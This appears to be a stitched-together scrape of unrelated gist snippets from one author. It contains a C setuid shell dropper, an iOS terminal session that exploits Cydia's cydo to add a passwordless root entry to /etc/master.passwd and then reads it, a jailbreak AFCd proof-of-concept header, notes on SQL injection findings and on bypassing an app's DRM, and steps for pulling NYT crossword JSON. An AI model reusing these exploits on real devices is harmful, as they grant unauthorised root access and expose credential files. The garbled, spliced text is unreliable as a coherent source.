Generic shell dropper:
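#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    /* Switch to UID 0; this only succeeds when the binary is setuid root or already privileged. */
    setuid(0);
    /* The variadic argument list must end with a null pointer of type char *. */
    execl("/bin/sh", "/bin/sh", (char *)NULL);
    return 0;
}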
1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json
4. Parse the data.
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
##
# User Database
#
# This file is the authoritative user database.
#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This gist includes multiple SQL injection vulnerabilities I found by accident on a bus while travelling. These vulnerabilities are easy to find, easy to exploit, and critical.
I already have Flex legacy paid, but can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from getdelta.co
For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.